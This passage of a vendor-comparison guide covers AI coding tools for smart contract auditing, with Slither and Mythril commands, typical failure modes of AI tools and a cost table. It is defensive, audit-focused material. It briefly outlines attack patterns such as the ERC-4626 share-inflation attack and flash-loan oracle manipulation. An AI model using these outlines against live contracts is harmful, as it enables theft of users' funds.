Slither runs fast (seconds) and produces categorized findings. The challenge is not running it — it is interpreting the output. Slither reports many findings, and most codebases produce dozens of informational and low-severity detections that are expected or by-design. The auditor must triage: which findings are real vulnerabilities, which are false positives, and which are code quality issues worth noting in the report?
# Run Slither with all detectors
slither src/VaultV1.sol --print human-summary
# Common output categories:
# HIGH: reentrancy-eth, reentrancy-no-eth, suicidal, unprotected-upgrade
# MEDIUM: reentrancy-benign, reentrancy-events, locked-ether
# LOW: solc-version, naming-convention, missing-zero-check
# INFORMATIONAL: pragma, dead-code, too-many-digits
# Export to JSON for programmatic analysis
slither src/ --json slither-output.json
# Run specific high-value detectors
slither src/ --detect reentrancy-eth,unprotected-upgrade,suicidal,arbitrary-send-eth
# Check for ERC conformance
slither src/Token.sol --print erc20
# Generate inheritance graph for audit scoping
slither src/ --print inheritance-graph
Mythril symbolic execution
Mythril uses symbolic execution to explore all reachable states and find concrete inputs that trigger vulnerabilities. It is slower than Slither (minutes to hours) but catches a different class of bugs — arithmetic issues, assertion violations, and state-dependent vulnerabilities that require specific input sequences.
# Run Mythril analysis
myth analyze src/VaultV1.sol --solv 0.8.20
# Increase execution depth for complex contracts
myth analyze src/VaultV1.sol --execution-timeout 900 --max-depth 50
# Analyze deployed contract (mainnet verification)
myth analyze --address 0x1234...abcd --rpc infura
# Common Mythril findings:
# SWC-107: Reentrancy
# SWC-101: Integer overflow/underflow (pre-0.8.0)
# SWC-110: Assert violation (invariant failure)
# SWC-105: Unprotected ether withdrawal
# SWC-112: Delegatecall to untrusted callee
# SWC-115: Authorization through tx.origin
Combining AI tools with static analyzers
The most effective audit workflow uses AI tools to interpret and extend static analyzer output. Run Slither and Mythril first, then use AI to triage and investigate:
Claude Code integrates directly with the terminal workflow. Run slither src/ --json output.json, then ask Claude Code to “analyze this Slither output, identify the real vulnerabilities, explain the false positives, and suggest which findings to investigate manually.” It correctly interprets Slither detector names, understands the SWC classification, and distinguishes between true positives and common false-positive patterns (e.g., reentrancy-benign flagged on a safe callback pattern). It can also suggest additional detectors or Slither printers to run based on the contract type.
Cursor is useful when you have the Slither output and the source code both in the IDE — you can ask it to correlate specific Slither findings with the relevant code and explain whether the finding is exploitable in context. Gemini CLI handles Slither JSON output well when you paste it into the long context window alongside the source code. Copilot, Windsurf, and Amazon Q can explain individual Slither findings but lack the contextual understanding to triage across an entire codebase’s output.
What AI Tools Get Wrong in Smart Contract Auditing
Every auditor using AI tools must understand their systematic failure modes. These are not rare edge cases — they are consistent patterns that appear across every tool we tested. Blindly trusting AI output in an audit context is professional negligence.
- Missing cross-function reentrancy (only catches single-function): Every tool flags the classic “external call before state update in the same function” pattern. Most tools miss reentrancy paths that span multiple functions: a callback from
withdraw()intoborrow(), or from a token transfer hook into a separate accounting function. Claude Code catches these about 80% of the time; all other tools catch them less than 40% of the time. Read-only reentrancy across contracts is caught by none of the tools reliably. - Generating “safe” code that is actually vulnerable: AI tools frequently generate ERC-20 interactions using
.transfer()or raw.transferFrom()without checking return values. Some tokens (USDT, BNB) do not returnboolon transfer. Others (USDT) revert on zero-amount transfers. Others (fee-on-transfer tokens) deliver less than the requested amount. The safe pattern is OpenZeppelin’sSafeERC20.safeTransfer(), but AI tools generate the unsafe version in roughly 60% of cases. - Not understanding proxy storage layouts: AI tools generate upgradeable contract implementations that insert new variables before existing ones, change variable types (e.g.,
uint128touint256), or remove the__gaparray. Each of these causes storage collision on upgrade. Only Claude Code consistently warns about storage layout preservation when generating V2 implementations. - Missing precision loss in division-before-multiplication: In Solidity,
(a / b) * ctruncates the intermediate result, losing precision. The correct order is(a * c) / b. AI tools generate division-before-multiplication in about 30% of share-price calculations, which creates exploitable rounding errors in vault and AMM contracts. The ERC-4626 vault inflation attack is the canonical example: deposit 1 wei, donate a large amount to inflate the share price, then subsequent small deposits round down to zero shares. - Generating ERC-20 interactions without safe transfer wrappers: Related to point 2, but broader: AI tools do not account for the full spectrum of ERC-20 non-compliance. Rebasing tokens (stETH), fee-on-transfer tokens (STA, PAXG), tokens with blacklists (USDC, USDT), tokens that block transfers to certain addresses, and tokens with permit functions that differ from EIP-2612. An auditor must verify that the protocol handles all token behaviors it claims to support.
- Not considering protocol composability: When asked to review a lending protocol, AI tools analyze the contract in isolation. They do not consider that an attacker can use an Aave flash loan to manipulate a Uniswap pool price, which feeds into a Chainlink oracle, which affects the lending protocol’s collateral valuation, which enables a profitable liquidation cascade. These multi-protocol attack chains are exactly what human auditors find, and no AI tool reliably reasons about them without explicit prompting.
- Suggesting OpenZeppelin patterns without version-specific context: OpenZeppelin’s API changes between major versions.
_setupRolewas deprecated in v5 in favor of_grantRole.Counters.solwas removed entirely in v5.ERC20Burnablechanged its inheritance requirements. AI tools frequently generate code using deprecated or removed functions from the wrong OpenZeppelin version, creating compilation errors or, worse, subtly different security properties. - Missing gas griefing and denial-of-service vectors: AI tools rarely flag unbounded loops over dynamic arrays (gas limit DoS), external calls in loops that can be griefed by a reverting receiver, block.timestamp manipulation within the 12-second tolerance, returndata bombs (a malicious contract that returns megabytes of data to consume the caller’s gas), or push-over-pull payment patterns that let one failed transfer block all other recipients.
AI tools are trained on code that was written, not on exploits that were executed. They understand patterns — “this looks like reentrancy” — but they do not reason about economic incentives, MEV, flash loan capital efficiency, or the game-theoretic behavior of rational adversaries. The most valuable bugs in an audit are the ones that require understanding why someone would exploit a contract, not just how. No AI tool replaces the auditor’s adversarial mindset.
Cost Model for Smart Contract Auditors
Smart contract auditors range from solo independents working contest platforms (Code4rena, Sherlock, Hats Finance) to established firms with enterprise tooling. Here is how AI tool costs scale across the spectrum:
| Profile | Stack | Monthly Cost | Best For |
|---|---|---|---|
| Solo contest auditor | Copilot Free + Slither + Mythril + Foundry | $0 | Beginners on Code4rena/Sherlock — all essential tools are free, Copilot covers test scaffolding |
| Independent auditor | Claude Code + Slither + Mythril + Foundry | $20 | Full-time independent auditors — Claude Code for deep reasoning, vulnerability detection, report drafting |
| Professional auditor | Claude Code + Copilot Pro + Foundry + Slither | $30 | Experienced auditors wanting both deep reasoning (Claude) and fast completions (Copilot) for PoC writing |
| Audit team member | Cursor Pro + Claude Code + Foundry + Certora | $40 | Team auditors who need multi-file IDE context (Cursor) plus terminal-based deep analysis (Claude Code) |
| Audit firm (per seat) | Cursor Business + Claude Code Team + Certora + Slither + custom tooling | $60–$99 | Firms (OpenZeppelin, Trail of Bits, Spearbit) needing team management, SSO, audit trail, IP protection |
The economics: A solo auditor on Code4rena earns $0–$50K per contest, with top auditors consistently in the $10K–$50K range per engagement. A $20/mo Claude Code subscription pays for itself if it helps you find one additional Medium-severity finding per contest. At the firm level, audit engagements range from $50K to $500K+, and tool costs at $99/seat are negligible relative to auditor salaries ($200K–$500K for experienced smart contract auditors). The ROI question is not “can we afford the tools” but “do the tools help us find more bugs in less time” — and for vulnerability pattern detection and report generation, the answer is unambiguously yes.
The Bottom Line
Smart contract auditing is the highest-stakes application of AI coding tools. The margin for error is zero — a missed vulnerability means real money lost, permanently, on an immutable blockchain. AI tools are force multipliers for experienced auditors, not replacements for audit expertise. They accelerate the work you already know how to do: triaging static analyzer output, writing invariant tests, drafting structured findings, and reasoning about complex interaction patterns. They do not replace the adversarial mindset, the economic reasoning, or the protocol-specific domain knowledge that separates a good auditor from an automated scanner.
The most effective setup for most auditors is Claude Code ($20/mo) plus the free open-source stack (Slither, Mythril, Foundry, Halmos) = $20/mo total. Claude Code handles the reasoning-heavy work: analyzing cross-function reentrancy paths, interpreting static analyzer output in context, generating Certora specs and Foundry invariant tests, and drafting audit reports. If you want inline completions for faster PoC writing and test scaffolding, add Copilot Pro ($10/mo) = $30/mo. If you audit large protocols with many contracts, add Cursor Pro ($20/mo) for its multi-file context = $40/mo.
The one thing AI tools cannot do is think like an attacker. They pattern-match against known vulnerability classes. They do not ask “what would I do with $100 million in flash loan capital and knowledge of every protocol this contract interacts with?” That question — the question that finds the $50 million bug — remains the auditor’s job. Use AI tools to handle the mechanics so you can spend more time on the reasoning. That is where the real value is.
Compare all tools and pricing on the CodeCosts homepage. If you build smart contracts rather than audit them, see the Blockchain & Web3 Developers guide. For general security engineering tooling, check the Security Engineers guide. For cryptographic implementation review, see the Cryptography Engineers guide.
Related on CodeCosts
- AI Coding Tools for Blockchain & Web3 Developers (2026) — Solidity, Rust/Solana, Foundry, gas optimization, DeFi development
- AI Coding Tools for Security Engineers (2026) — pentesting, SIEM, IaC scanning, vulnerability research
- AI Coding Tools for Cryptography Engineers (2026) — AES-GCM, elliptic curves, TLS, side-channel mitigation